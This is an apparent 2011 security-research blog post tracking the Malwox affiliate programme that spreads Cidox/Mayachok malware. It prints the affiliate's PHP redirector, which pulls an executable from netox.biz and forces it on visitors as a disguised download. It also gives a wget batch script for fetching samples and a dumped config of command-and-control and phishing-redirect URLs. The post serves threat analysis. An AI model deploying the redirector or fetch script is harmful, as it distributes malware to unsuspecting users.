Wednesday 9 November 2011

Tracking Cyber Crime: Malwox (Win32/Cidox Affiliate) Mayachok.1

 Adv:

ICQ ~





Registration process is simple, first you should have a cookie or you will see only a blank page.
This is for prevent curious, after you can make your account but you need an invite + admin activation


Login:

Registration:








Statistic of the day:

Malware download:

Profile:

News:

Redirector:
<?php
 $filename = './soft.exe';
 copy('http://netox.biz/files/user_id.exe','soft.exe');
 if (isset($_SERVER['HTTP_USER_AGENT']) and strpos($_SERVER['HTTP_USER_AGENT'],
 'MSIE'))
 Header('Content-Type: application/force-download');
 else
 Header('Content-Type: application/octet-stream');
 Header('Accept-Ranges: bytes');
 Header('Content-Length: ' . filesize($filename));
 Header('Content-disposition: attachment; filename="' . translitIt($_GET['fname']) .
 '.exe"');
 readfile($filename);
 exit();
 function translitIt($str)
 {
 $tr = array("А" => "A", "Б" => "B", "В" => "V", "Г" => "G", "Д" => "D", "Е" =>
 "E", "Ж" => "J", "З" => "Z", "И" => "I", "Й" => "Y", "К" => "K", "Л" => "L", "М" =>
 "M", "Н" => "N", "О" => "O", "П" => "P", "Р" => "R", "С" => "S", "Т" => "T", "У" =>
 "U", "Ф" => "F", "Х" => "H", "Ц" => "TS", "Ч" => "CH", "Ш" => "SH", "Щ" => "SCH",
 "Ъ" => "", "Ы" => "YI", "Ь" => "", "Э" => "E", "Ю" => "YU", "Я" => "YA", "а" =>
 "a", "б" => "b", "в" => "v", "г" => "g", "д" => "d", "е" => "e", "ж" => "j", "з" =>
 "z", "и" => "i", "й" => "y", "к" => "k", "л" => "l", "м" => "m", "н" => "n", "о" =>
 "o", "п" => "p", "р" => "r", "с" => "s", "т" => "t", "у" => "u", "ф" => "f", "х" =>
 "h", "ц" => "ts", "ч" => "ch", "ш" => "sh", "щ" => "sch", "ъ" => "y", "ы" =>
 "yi", "ь" => "", "э" => "e", "ю" => "yu", "я" => "ya", " " => "_");
 $sk = array("Скачать", "скачать");
 return strtr(str_replace($sk, "", $str), $tr);
 }
 ?>

Sample downloader: (or just mail me and i'll sent you a pack)
set target=netox.biz/files/
set filename1=user_
set filename2=.exe
set droppath=www
set start=1
set end=666
set step=1
if not exist %droppath% (
mkdir %droppath% )
FOR /L %%G IN (%start%, %step%, %end%) DO wget -U "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" -S -t 100 -P / "%target%%filename1%%%G%filename2%" -O "%droppath%/%filename1%%%G%filename2%"
echo.
echo Done.
pause



Cidox seem also repacked (i don't know the interval) for avoid detections.

Malwox guys are responsible for the willysy.com Mass Injection ongoing
Here are some screenshots i've taken from the panel:



Payload dll set in AppInit_Dlls, as (in my case) C:\WINDOWS\system32\yxobjxi.dll
Dropper writes all required information and reboots computer with ExitWindowsEx.

dumped part of the dll from explorer:
30 yandexapps.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 gcoglestats.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 msn-dns.com/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 94.102.49.64/loPtfdn3dSasoicn/get.php?key= &id= &os= &av= &vm= &al= &p= &z=351 youtube.com t/terms 0 yandexapps.com/yt_lxegvj4efc/tube.php?uid= &id= &url= help.vkontakte.ru 0 yandexapps.com/lo_nhyg38deijiwsx/vhelp.php?uid= &id= &url= help.mail.ru 0 yandexapps.com/ma_ghjkmnbgvfrt/mail.php?uid= &id= &url= admin.vkontakte.ru 0 yandexapps.com/lo_nhyg38deijiwsx/kr_vnhuirw43/vadmin.php?uid= &id= &url= update.microsoft.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= update.mozilla.org 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= download.opera.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= chrome.google.com 0 yandexapps.com/bt_pdfn3skxler/index.php?uid= &id= &url= official.odnoklassniki.ru 0 yandexapps.com/od_xafhuy2ed/ohelp.php?uid= &id= &url= rushotgirls.com 0 yandexapps.com/bn_9iknfbcgtl/index.php?uid= &id= &url= internet.com 0 yandexapps.com/in_xbvgyui3vf/index.php?uid= &id= &url= *.co.cc 0 www.yandex.ru/ yandexapps.com/loPtfdn3dSasoicn/post.php?id= &form= &url= !CFG

2 comments: